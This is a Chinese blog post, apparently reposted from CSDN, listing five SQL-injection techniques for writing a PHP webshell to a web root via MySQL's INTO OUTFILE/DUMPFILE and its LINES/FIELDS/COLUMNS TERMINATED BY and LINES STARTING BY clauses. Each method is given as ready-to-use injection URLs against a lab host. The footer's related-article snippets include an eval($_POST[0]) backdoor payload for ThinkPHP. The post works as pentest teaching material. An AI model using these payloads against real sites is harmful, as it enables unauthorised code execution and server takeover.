mysql 注入写shell_MYSQL存在注入点,写WebShell的5种方式 · Manning23

最新推荐文章于 2024-05-17 08:26:16 发布
最新推荐文章于 2024-05-17 08:26:16 发布
阅读量301 收藏
点赞数
文章标签: mysql 注入写shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31953847/article/details/113441002
版权

2ff34e647e2e3cdfd8dca593e17d9b0a.png

很久没更新了,分享一个2017年的笔记。

0x00 写数据前提

1,在mysql的配置文件 my.ini 中,secure_file_priv="c:/wamp64/tmp" 被注释 或者 `secure_file_priv 配置的位置是web目录。

2,未开启全局gpc。

0x01 环境准备

测试语句http://172.16.55.130/work/sqli-1.php?id=1

页面显示效果

276902a6ac23904c2ea8745286e8b12c.png

0x02 union select 后写入最常见的写入方式,union select 后跟 into outfile 语句

http://172.16.55.130/work/sqli-1.php?id=@ union select 1,2,3,4,'<?php phpinfo() ?>' into outfile 'C:/wamp64/www/work/webshell.php'

http://172.16.55.130/work/sqli-1.php?id=@ union select 1,2,3,4,'<?php phpinfo() ?>' into dumpfile 'C:/wamp64/www/work/webshell.php'

PS: 在windows下,位置的分隔符为 /(斜杠)。

0x03 lines terminated by 写入

注入点语句http://172.16.55.130/work/sqli-1.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';

http://172.16.55.130/work/sqli-1.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';

执行语句后,页面显示内容

0c9d428f170e9a20cd968bbe2b50a9f5.png

完整的Sql语句select * from phpcmsv9.v9_admin_role where roleid = 1 into outfile 'C:/wamp64/www/work/webshell.php' lines terminated by '<?php phpinfo() ?>';

Webshell显示

172b9162f96e842e4d36d69bdfec3290.png

注入原理

通过select语句查询的内容写入文件,也就是 1 into outfile 'C:/wamp64/www/work/webshell.php' 这样写的原因,然后利用 lines terminated by 语句拼接webshell的内容。lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。

0x04 lines starting by 写入

注入点语句http://172.16.55.130/work/sqli-1.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' lines starting by '<?php phpinfo() ?>';

http://172.16.55.130/work/sqli-1.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' lines starting by '<?php phpinfo() ?>';

注入原理

利用 lines starting by 语句拼接webshell的内容。lines starting by 可以理解为 以每行开始的位置添加 xx 内容。

0x05 fields terminated by 写入

注入点语句http://172.16.55.130/work/sqli-1.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' fields terminated by '<?php phpinfo() ?>';

http://172.16.55.130/work/sqli-1.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' fields terminated by '<?php phpinfo() ?>';

注入原理

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

0x06 COLUMNS terminated by 写入

注入点语句http://172.16.55.130/work/sqli-1.php?id=1 into outfile 'C:/wamp64/www/work/webshell.php' COLUMNS terminated by '<?php phpinfo() ?>';

http://172.16.55.130/work/sqli-1.php?id=1 limit 1 into outfile 'C:/wamp64/www/work/webshell.php' COLUMNS terminated by '<?php phpinfo() ?>';

注入原理

利用 fields terminated by 语句拼接webshell的内容。fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。

参考资料

不乱说话
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MySQL数据库webshell
weixin_45253622的博客
03-24 934
MySQL数据库webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 入的那个路径存在入权限 注意: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
mysqlshell
weixin_47385895的博客
08-22 1972
mysql常见shell方法
mysql 注入shell_mysql注入shell
weixin_31001855的博客
01-19 283
如果一个平台有注入的时候可以通过一句话拿shell条件1.myql 5.6.34 版本区分2.有的权限3.知道绝对路径MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在secure_file_priv 的默认值被修改为无才能利用,且这个只能手工修改配置...
MySQL注入shell的条件
huang0612123的博客
05-13 382
HVV面试
sql注入shell
weixin_51646864的博客
04-23 6813
靶场练习一下sql注入shell方式
ThinkPHP v3.2 comment 注释注入 shell
qq_53263789的博客
02-09 330
漏洞详情 comment函数是用来进行查询注释功能,当执行sql语句时,搭配comment可能存在利用注释进行shell或者时间盲注 漏洞复现 控制器入demo $user = M('Users')->comment($id)->find(intval($id)); payload ?id=1*/ into outfile "/var/www/html/3.php" LINES STARTING BY '<?php eval($_POST[0]);?>'/* 漏洞分析 首先
第01篇:MySQL注入WebShell的5方式1
08-03
本文将探讨如何利用MySQL注入WebShell五种方法,重关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入至关重要。这通常发生在应用程序的输入验证不足,使得攻击者可以插入额外的SQL代码到查询...
mysql log shell_利用mysql general log shell 可行性简要分析
weixin_39867594的博客
02-05 808
0×01 前言实际渗透过程中,我们很可能会遇到这样的情况,明明是正儿八经的mysql root权限,但实际利用into outfileshell的时候,却怎么都不进去,前提可以肯定的是,我们对目标的网站目录绝对是有权限的且mysql的root用户本身并没有被降权,一般出现这样的情况很可能就是因为into outfile被禁用或waf拦截,希望下面的方式能帮到你0×02 拿shell利用mys...
mysql注入shell的内置函数_sql注入shell条件与方法(统计)
weixin_39884078的博客
02-08 1122
条件:php1:要知道网站绝对路径,能够经过报错,phpinfo界面,404界面等一些方式知道mysql2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了web3:要有file权限,默认状况下只有root有sql4:对目录要有权限,通常image之类的存放突破的目录就有shellmysql的配置文件my.ini中,secure_file_priv="c:/wamp64/tmp"被...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
MySQL注入中,由于其...总之,虽然MySQL的特性限制了某些类型的攻击,但仍然存在方式利用SQL注入导出字段内容或创建WebShell。开发人员应当保持警惕,确保应用程序的安全性,遵循最佳实践来防止这些潜在的威胁。
mysql root拿shell_mysql的几获取shell和提权的方式
weixin_42557537的博客
02-26 648
♥喜欢请个赞吧♥mysql outfile导出webshell条件:知道物理路径,root权限,同时mysql需要有write权限,secure_file_priv配置不为null,查看方法:show global variables like '%secure_file_priv%';这个参数只能通过修改配置文件后重启mysql修改。1.select '' into outfile 'C:ph...
mysql注入,getshell
m0_65096687的博客
05-09 499
1.首先搭建dvwa靶场 在mysql中my.ini的文件中需要更改配置D:\phpStudy\PHPTutorial\MySQL这是我pc的目录下 进入my.ini后在 [mysqld] 下添加 secure_file_priv="" secure_file_priv="" 意思是对用户导入导出内容不受限制 进入靶场老规矩把安全等级改为low 测试一下是否可以读取www下的文件内容 -1' union select load_file('D:/phpStudy/PHPTutorial/WW.
sqlshell原理_sql注入shell的条件
最新发布
2401_84281655的博客
05-17 952
1. 知晓网站的绝对路径原因是因为在指定--os-shell参数时,期间会让你输入要入木马的web路径,不然蚁剑如何连接获取方式有:(1)网页报错信息 (2)phpinfo等探针信息 (3)猜测常见web目录2. 对web目录有可权限即secure_file_priv = ''配置为空原因是--os-shell参数shell使用的是select xx into outfile而secure_file_priv此配置。
SQL手工注入mysqlshell复习
叶子的Blog
01-06 1237
Mysql 手工注入 1.1 联合注入 ?id=1' order by 4--+ ?id=0' union select 1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0' union select 1,2,3,group_concat(column_name) fro
报错注入shell
G3et的博客
04-16 281
lines starting by 可以理解为 以每行开始的位置添加 xx 内容,如果查询不到这个值的时候则为空 也就是了个空文件。报错的基本语法:updatexml(1,concat(0x7e,(select version()),0x7e),1)fields terminated by 可以理解为 以每个字段的位置添加 xx 内容。lines terminated by 可以理解为 以每行终止的位置添加 xx 内容。当以为能这样执行命令的时候尝试去在语法中shell是不对的,语法是错误的。
mysql 手注 shell_php+mysql手注拿shell教程
weixin_39778582的博客
02-18 152
注:此文章献给那些还对注入不怎么理解的人学习! 目标站:http://www.51team.cn/ 注入:http://www.51team.cn/newmess.php?id=138 找到注入后猜字段,可用order by 1猜解,order by不可用时,可用union联合查询! 我这里猜解到的字段是22, 上图: 接下注:此文章献给那些还对注入不怎么理解的人学习!目标站:http://w...
mysql注入shell
weixin_30673715的博客
06-13 420
如果一个平台有注入的时候可以通过一句话拿shell 条件 1.myql 5.6.34 版本区分 2.有的权限 3.知道绝对路径 MySQL 中 在在mysql 5.6.34版本以后 secure_file_priv的值默认为NULL ,而 secure_file_priv为null 那么我们就不能导出文件,以下都建立在 secure_file_priv 的默认...
MySql注入到GetShell
Williamanddog的博客
01-17 595
mysql数据库中存在mysql select into outfile命令,该命令的作用是将被选择的一行入一个文件。(2)要有mysql file权限(即能否对系统的文件读取和操作),默认情况下只有root权限有。在配置文件中,我们可以看到数据库的用户名为root,密码为p@ssw0rd。(3)对目录要有权限,一般image之类的存放图片的目录有权限。还要注意:的文件名一定是在网站中不存在的,不然会失败。然后我们通过蚁剑的数据连接就可以进入数据库。然后我们进入config目录查看配置文件。
mysql_mysql多语句shell
weixin_30312037的博客
02-01 94
mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D2...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值